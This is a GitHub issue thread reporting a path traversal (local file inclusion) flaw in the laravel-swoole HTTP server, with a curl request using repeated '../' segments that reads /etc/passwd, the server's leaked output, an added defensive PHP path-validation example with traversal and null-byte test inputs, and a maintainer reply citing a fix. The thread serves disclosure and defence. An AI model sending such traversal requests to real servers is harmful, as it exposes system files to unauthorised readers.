swooletw / laravel-swoole

High performance HTTP server based on Swoole. Speed up your Laravel or Lumen applications.
MIT License

Local File Inclusion (LFI) vulnerability #463

Closed jimanx2 closed 3 years ago

jimanx2 commented 3 years ago

Make sure you read Issues Guideline and answer these questions before submitting your issue. Thanks! (Any non-English issues will be closed immediately.)

  1. Please provide your PHP and Swoole version. (php -v and php --ri swoole)
PHP 7.3.18 (cli) (built: May 15 2020 04:09:37) ( NTS )
Copyright (c) 1997-2018 The PHP Group
Zend Engine v3.3.18, Copyright (c) 1998-2018 Zend Technologies

swoole

Swoole => enabled
Author => Swoole Team <team@swoole.com>
Version => 4.5.2
Built => Jul  9 2020 16:08:59
coroutine => enabled
epoll => enabled
eventfd => enabled
signalfd => enabled
spinlock => enabled
rwlock => enabled
openssl => OpenSSL 1.1.1g  21 Apr 2020
http2 => enabled
zlib => 1.2.11
brotli => E16777223/D16777223
mutex_timedlock => enabled
pthread_barrier => enabled
mysqlnd => enabled
async_redis => enabled
  2. Please provide your Laravel/Lumen version.
name     : laravel/lumen-framework
descrip. : The Laravel Lumen Framework.
keywords : framework, laravel, lumen
versions : * v5.8.13
  3. Which release version of this package are you using?
name     : swooletw/laravel-swoole
descrip. : High performance HTTP server based on Swoole. Speed up your Laravel and Lumen applications.
keywords : http, laravel, lumen, performance, server, swoole
versions : * v2.6.68
  4. What did you do? If possible, provide a recipe for reproducing the error.

curl -v --path-as-is http://localhost:1215/../../../../../../../../../../../etc/passwd

  5. What did you expect to see?

404 Not Found

  6. What did you see instead?
*   Trying 127.0.0.1:1215...
* TCP_NODELAY set
* Connected to localhost (127.0.0.1) port 1215 (#0)
> GET /../../../../../../../../../../../etc/passwd HTTP/1.1
> Host: localhost:1215
> User-Agent: curl/7.68.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Content-Type: application/octet-stream
< Server: swoole-http-server
< Connection: keep-alive
< Date: Wed, 20 Jan 2021 04:11:28 GMT
< Content-Length: 1395
<
root:x:0:0:root:/root:/bin/ash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
[REMAINING REDACTED]
* Connection #0 to host localhost left intact

Kindly advise what I can do to block this.
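The report above boils down to a static-file handler building a filesystem path from the raw request path without confirming that the resolved file still lies under the public directory. The following PHP is an added example (not laravel-swoole's own code, and not the fix in the linked pull request) of the checks such a handler needs: strip the query string, percent-decode, reject control bytes, resolve to a canonical path with `realpath()`, and compare against the canonical document root. The helper name `resolveStaticFile` and the temporary directory used in the demonstration are assumptions for the example.

```php
<?php
declare(strict_types=1);

/**
 * Resolve a request path to a regular file inside $publicRoot.
 * Returns the canonical path on success, or null when the handler
 * should answer 404 (missing file, bad characters, or a path that
 * escapes the document root).
 *
 * Hypothetical helper for illustration; not the project's own code.
 */
function resolveStaticFile(string $publicRoot, string $requestPath): ?string
{
    // Canonical root, so symlinks and "." segments cannot confuse the prefix test.
    $root = realpath($publicRoot);
    if ($root === false || !is_dir($root)) {
        return null;
    }

    // Keep only the path component and decode percent-encoding before validating,
    // otherwise "%2e%2e" would slip past a check that only looks for "..".
    $path = rawurldecode(explode('?', $requestPath, 2)[0]);

    // Null bytes and other control characters never belong in a file path.
    if ($path === '' || preg_match('/[\x00-\x1f]/', $path) === 1) {
        return null;
    }

    // realpath() collapses ".." and resolves symlinks; it returns false when
    // the target does not exist, which is already a 404.
    $candidate = realpath($root . DIRECTORY_SEPARATOR . ltrim($path, '/'));
    if ($candidate === false || !is_file($candidate)) {
        return null;
    }

    // Decisive check: the resolved file must sit below the root, not merely
    // share a string prefix with it ("/var/www/public" vs "/var/www/public2").
    $prefix = rtrim($root, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null; // escaped the public directory: treat as 404
    }

    return $candidate;
}

// Demonstration against a constructed public directory (temporary, created here).
$pub = sys_get_temp_dir() . '/pub_' . bin2hex(random_bytes(4));
mkdir($pub);
file_put_contents($pub . '/index.html', 'hello');

$cases = [
    '/index.html',                          // legitimate file under the root
    '/index.html?v=1',                      // query string is ignored
    '/../../../../../../../etc/passwd',     // the request from the report
    '/%2e%2e/%2e%2e/etc/passwd',            // same traversal, percent-encoded
    "/index.html\0.png",                    // embedded null byte
];
foreach ($cases as $case) {
    $resolved = resolveStaticFile($pub, $case);
    printf("%-40s => %s\n", json_encode($case), $resolved ?? 'null (404)');
}

unlink($pub . '/index.html');
rmdir($pub);
```

Only the first two cases resolve to the file under the temporary root; the three traversal and control-byte cases return null, which is exactly the 404 the reporter expected. The ordering matters: decoding happens before the control-character check, and the root-prefix comparison runs on the output of `realpath()`, so any `..` sequences have already been collapsed by the time the path is compared.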

Arkanius commented 3 years ago

It's already fixed at https://github.com/swooletw/laravel-swoole/pull/462

We're going to release the fix this week

jimanx2 commented 3 years ago

Great work guys. I loved swoole so much! :D